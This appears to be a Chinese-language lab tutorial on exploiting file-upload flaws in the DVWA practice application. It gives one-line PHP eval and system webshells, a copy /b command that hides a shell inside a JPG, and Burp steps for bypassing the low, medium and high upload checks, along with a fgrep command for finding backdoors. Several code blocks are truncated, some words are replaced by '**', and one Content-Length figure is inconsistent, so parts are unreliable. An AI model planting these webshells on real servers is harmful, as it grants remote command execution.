DVWA漏洞演練平台檔案上傳

本來想使用中國菜刀來演示webshell的使用的，但中國菜刀太老了且不開源，還爆出過各種後門，所以筆者比較有陰影，這裡我就使用中國蟻劍，中國蟻劍是一款開源的跨平台**管理工具，它主要面向於合法授權的滲透測試安全人員以及進行常規操作的**管理員，其使用方法和菜刀差不多而且跨平台。

> git clone 
> git clone

1.eval命令使用php系統中的函式

<?php eval($_request['cmd']); ?>
呼叫方式：

2.system命令使用linux系統命令

# system 使用系統命令
<?php system($_request['cmd']); ?>
/etc/passwd

3.木馬的製作，php為例，執行cmd命令後會在當前位置生成乙個lyshark.jpg的木馬

準備1： shell.php

準備2：shell.jpg

執行cmd命令： copy shell.jpg/b+shell.php lyshark.jpg

4.中國蟻劍小馬的寫法

php： <?php @eval($_post['lyshark']); ?>
asp:  
.net：

如上以php**為例，我們將其儲存為shell.php然後上傳至php主機空間中，配置蟻劍，配置好以後我們直接點選新增，就可以對**進行管理了。

拓展：在linux系統中如果想要排查是否有惡意的後門可以使用：fgrep -r 'eval($_post[' /var/www/ 這條命令來排查。

如下**就是dvwa低安全級別的**，可以看到**中並沒有對上傳的檔案進行任何的過濾，有些web應用會將上傳檔案的過濾工作在前端用js來實現，以為這樣可以減少伺服器的負載，不過對於專業的技術人員來說，前端js驗證的方式可以被輕鬆的繞過。前端js驗證是用來糾正錯誤輸入的。

<?php 
if( isset( $_post[ 'upload' ] ) ) 
else  succesfully uploaded!

}}?>

1.這裡我們使用brup來上傳乙個簡單的 lyshark.jpg 檔案，然後上傳途中使用brup將其改為 shell.php ，首先brup開啟抓包，然後回到web應用上選擇 lyshark.jpg 檔案，點選上傳按鈕，接著brup會攔截這個請求。

2.然後我們需要修改brup中的兩個引數，需要注意的是：在http協議中有請求頭content-length它代表的是實體的正文長度，如果此時我們將檔名修改，也就意味著實體正文的長度增加或者減少了，所以也要修改請求頭的大小才能夠保證上傳成功。

上面的例子：我們將 lyshark.jpg 修改為了 shell.php ，也就是說正文的長度減少了2，所以在content-length長度上需要減去2，預設是500這裡要改成448，然後放行就可以上傳成功了。

隨著開發人員安全意識的提高，使用前端js來驗證的方式越來越少，一般會將驗證環節放在服務端進行，相比於低安全級別來說，中安全級別**如下，可以看到該級別增加了mime型別的驗證，開發人員經常會對mime型別做驗證，從而保證上傳檔案的可靠性，但這樣做還遠遠不夠，總還是可以被繞過。

<?php 
if( isset( $_post[ 'upload' ] ) ) 
else  succesfully uploaded!

";}}

else

}?>

1.首先使用brup開啟抓包，然後回到web頁面上，此時我們上傳乙個 shell.php 然後點選上傳，此時brup攔截乙個請求，通過觀察content-type引數可發現並不是乙個的格式，所以上傳會失敗。

高安全級別的**如下，僅僅只是判斷檔案的字尾，我們只需要製作乙個木馬。

<?php 
if( isset( $_post[ 'upload' ] ) )  
else  succesfully uploaded!

} }

else

}?>

1.製作木馬，直接上傳就好。

準備1： shell.php

準備2：shell.jpg

執行cmd命令： copy shell.jpg/b+shell.php lyshark.jpg

DVWA漏洞演練平台 檔案上傳